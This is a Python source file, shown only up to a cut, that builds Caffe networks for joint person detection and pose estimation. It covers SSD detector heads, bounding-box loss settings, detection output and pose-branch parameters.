6211db5f98ad924845ac421e101da6f64069fb82 | 44,155 | py | Python | remodet_repository_wdh_part/Projects/DetPoseJoint/DAPNet.py | UrwLee/Remo_experience | a59d5b9d6d009524672e415c77d056bc9dd88c72 | ["MIT"] | null | null | null | remodet_repository_wdh_part/Projects/DetPoseJoint/DAPNet.py | UrwLee/Remo_experience | a59d5b9d6d009524672e415c77d056bc9dd88c72 | ["MIT"] | null | null | null | remodet_repository_wdh_part/Projects/DetPoseJoint/DAPNet.py | UrwLee/Remo_experience | a59d5b9d6d009524672e415c77d056bc9dd88c72 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import math
sys.dont_write_bytecode = True
import caffe
from caffe import layers as L
from caffe import params as P
from caffe.proto import caffe_pb2
sys.path.append('../')
from PyLib.LayerParam.MultiBoxLossLayerParam import *
from PyLib.NetLib.ConvBNLayer import *
from PyLib.NetLib.InceptionLayer import *
from PyLib.NetLib.MultiScaleLayer import *
from BaseNet import *
from AddC6 import *
from DetectorHeader import *
from DAP_Param import *
from DAPData import lr_basenet
from mPoseNet_Reduce import *
pose_string = '_pose'  # name suffix for the pose-branch copies of the data/label layers and base net
from PyLib.NetLib.VggNet import VGG16_BaseNet_ChangeChannel
from mPoseNet_ResidualNet import mPoseNet_COCO_ShuffleVariant_PoseFromReconBase_Train
# ##############################################################################
# ------------------------------------------------------------------------------
# Final Network
def DAPNet(net, train=True, data_layer="data", gt_label="label", \
net_width=512, net_height=288):
# BaseNet
use_sub_layers = (6, 7)
num_channels = (144, 288)
output_channels = (128, 0)
channel_scale = 4
add_strs = "_recon"
flag_withparamname=True
net = ResidualVariant_Base_A_base(net, data_layer=data_layer, use_sub_layers=use_sub_layers, num_channels=num_channels,
output_channels=output_channels,channel_scale=channel_scale,lr=lr_basenet, decay=1.0, add_strs=add_strs,flag_withparamname=True)
net = ResidualVariant_Base_A_base(net, data_layer=data_layer+pose_string, use_sub_layers=use_sub_layers, num_channels=num_channels,
output_channels=output_channels,channel_scale=channel_scale,lr=lr_basenet, decay=1.0, add_strs=add_strs,flag_withparamname=True,pose_string=pose_string)
# Add Conv6
conv6_output = Conv6_Param.get('conv6_output',[])
conv6_kernal_size = Conv6_Param.get('conv6_kernal_size',[])
out_layer = "conv3_7_recon_relu"
net = addconv6(net, from_layer=out_layer, use_bn=True, conv6_output=conv6_output, \
conv6_kernal_size=conv6_kernal_size, pre_name="conv6",start_pool=True,lr_mult=1, decay_mult=1,n_group=1)
featuremap1 = ["pool1_recon","conv2_6_recon_relu"]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap1"
UnifiedMultiScaleLayers(net,layers=featuremap1, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Concat FM2
featuremap2 = ["conv2_6_recon_relu","conv3_7_recon_relu"]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap2"
UnifiedMultiScaleLayers(net,layers=featuremap2, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Concat FM3
c6_layer = 'conv6_{}'.format(len(Conv6_Param['conv6_output']))
featuremap3 = ["conv3_7_recon_relu",c6_layer]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap3"
UnifiedMultiScaleLayers(net,layers=featuremap3, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Create SSD Header for SSD1
lr_mult = 1
decay_mult = 1.0
mbox_1_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_1.get('feature_layers',[]), \
num_classes=ssd_Param_1.get("num_classes",2), \
boxsizes=ssd_Param_1.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_1.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_1.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_1.get("anchor_flip",True), \
clip=ssd_Param_1.get("anchor_clip",True), \
normalizations=ssd_Param_1.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_1.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_1.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_1.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_1.get('bboxloss_use_dense_boxes',False), \
stage=1,lr_mult=lr_mult, decay_mult=decay_mult)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_1.get("bboxloss_normalization",P.Loss.VALID))
mbox_1_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson':ssd_Param_1.get('flag_noperson',False),
}
net["mbox_1_loss"] = L.DenseBBoxLoss(*mbox_1_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_1_loss"] = L.BBoxLoss(*mbox_1_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_1_conf_reshape"
net[reshape_name] = L.Reshape(mbox_1_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_1.get("num_classes",2)]))
softmax_name = "mbox_1_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_1_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_1_layers[1] = net[flatten_name]
elif ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_1_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_1_layers[1])
mbox_1_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_1.get("num_classes",2),
'target_labels': ssd_Param_1.get('detout_target_labels',[]),
'alias_id':ssd_Param_1.get("alias_id",0),
'conf_threshold':ssd_Param_1.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_1.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_1.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_1.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_1 = L.DenseDetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_1 = L.DetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# make Loss & Detout for SSD2
lr_mult = 1.0
decay_mult = 1.0
if use_ssd2_for_detection:
mbox_2_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_2.get('feature_layers',[]), \
num_classes=ssd_Param_2.get("num_classes",2), \
boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_2.get("anchor_flip",True), \
clip=ssd_Param_2.get("anchor_clip",True), \
normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
stage=2,lr_mult=lr_mult, decay_mult=decay_mult)
        # make Loss or Detout for SSD2
if train:
loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
mbox_2_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson': ssd_Param_2.get('flag_noperson', False),
}
net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_2_conf_reshape"
net[reshape_name] = L.Reshape(mbox_2_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
softmax_name = "mbox_2_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_2_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_2_layers[1] = net[flatten_name]
elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_2_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
mbox_2_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_2.get("num_classes",2),
'target_labels': ssd_Param_2.get('detout_target_labels',[]),
'alias_id':ssd_Param_2.get("alias_id",0),
'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_2.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_2 = L.DetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# EVAL in TEST MODE
if not train:
det_eval_param = {
'gt_labels': eval_Param.get('eval_gt_labels',[]),
'num_classes':eval_Param.get("eval_num_classes",2),
'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
'background_label_id':0,
}
if use_ssd2_for_detection:
det_out_layers = []
det_out_layers.append(net['detection_out_1'])
det_out_layers.append(net['detection_out_2'])
name = 'det_out'
net[name] = L.Concat(*det_out_layers, axis=2)
net.det_accu = L.DetEval(net[name], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.det_accu = L.DetEval(net['detection_out_1'], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
###pose
pose_test_kwargs={
# nms
'nms_threshold': 0.05,
'nms_max_peaks': 500,
'nms_num_parts': 18,
# connect
'conn_is_type_coco': True,
'conn_max_person': 10,
'conn_max_peaks_use': 20,
'conn_iters_pa_cal': 10,
'conn_connect_inter_threshold': 0.05,
'conn_connect_inter_min_nums': 8,
'conn_connect_min_subset_cnt': 3,
'conn_connect_min_subset_score': 0.4,
# visual
'eval_area_thre': 64*64,
'eval_oks_thre': [0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9],
}
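    # These keys parameterize the test-phase pose layers (Nms, Connectlimb,
    # PoseEval); the same names are consumed explicitly in DAPPoseNet below.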
print net.keys()
if train:
net_base = None
net_stage = None
        net = mPoseNet_COCO_ShuffleVariant_PoseFromReconBase_Train(net, data_layer="data"+pose_string, label_layer="label"+pose_string, train=True, **pose_test_kwargs)
else:
net = mPoseNet_COCO_ShuffleVariant_PoseFromReconBase_Train(net, data_layer="data"+pose_string, label_layer="label"+pose_string, train=False, **pose_test_kwargs)
print net.keys()
return net
def DAPPoseNet(net, train=True, data_layer="data", gt_label="label", net_width=512, net_height=288):
# BaseNet
channels = ((32,), (32,), (64, 32, 128), (128, 64, 128, 64, 256), (256, 128, 256, 128, 256))
strides = (True, True, True, False, False)
kernels = ((3,), (3,), (3, 1, 3), (3, 1, 3, 1, 3), (3, 1, 3, 1, 3))
pool_last = (False,False,False,True,True)
net = VGG16_BaseNet_ChangeChannel(net, from_layer=data_layer, channels=channels, strides=strides,
kernels=kernels,freeze_layers=[], pool_last=pool_last,flag_withparamname=True,)
net = VGG16_BaseNet_ChangeChannel(net, from_layer=data_layer + pose_string, channels=channels, strides=strides,
kernels=kernels, freeze_layers=[], pool_last=pool_last, flag_withparamname=True, pose_string = pose_string)
conv6_output = Conv6_Param.get('conv6_output', [])
conv6_kernal_size = Conv6_Param.get('conv6_kernal_size', [])
out_layer = "pool5"
net = addconv6(net, from_layer=out_layer, use_bn=True, conv6_output=conv6_output, \
conv6_kernal_size=conv6_kernal_size, pre_name="conv6", start_pool=False, lr_mult=1, decay_mult=1,
n_group=1)
# Create SSD Header for SSD1
lr_mult = 1
decay_mult = 1.0
mbox_1_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_1.get('feature_layers',[]), \
num_classes=ssd_Param_1.get("num_classes",2), \
boxsizes=ssd_Param_1.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_1.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_1.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_1.get("anchor_flip",True), \
clip=ssd_Param_1.get("anchor_clip",True), \
normalizations=ssd_Param_1.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_1.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_1.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_1.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_1.get('bboxloss_use_dense_boxes',False), \
stage=1,lr_mult=lr_mult, decay_mult=decay_mult)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_1.get("bboxloss_normalization",P.Loss.VALID))
mbox_1_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson':ssd_Param_1.get('flag_noperson',False),
}
net["mbox_1_loss"] = L.DenseBBoxLoss(*mbox_1_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_1_loss"] = L.BBoxLoss(*mbox_1_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_1_conf_reshape"
net[reshape_name] = L.Reshape(mbox_1_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_1.get("num_classes",2)]))
softmax_name = "mbox_1_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_1_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_1_layers[1] = net[flatten_name]
elif ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_1_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_1_layers[1])
mbox_1_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_1.get("num_classes",2),
'target_labels': ssd_Param_1.get('detout_target_labels',[]),
'alias_id':ssd_Param_1.get("alias_id",0),
'conf_threshold':ssd_Param_1.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_1.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_1.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_1.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_1 = L.DenseDetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_1 = L.DetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# make Loss & Detout for SSD2
lr_mult = 1.0
decay_mult = 1.0
if use_ssd2_for_detection:
mbox_2_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_2.get('feature_layers',[]), \
num_classes=ssd_Param_2.get("num_classes",2), \
boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_2.get("anchor_flip",True), \
clip=ssd_Param_2.get("anchor_clip",True), \
normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
stage=2,lr_mult=lr_mult, decay_mult=decay_mult)
        # make Loss or Detout for SSD2
if train:
loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
mbox_2_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson': ssd_Param_2.get('flag_noperson', False),
}
net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
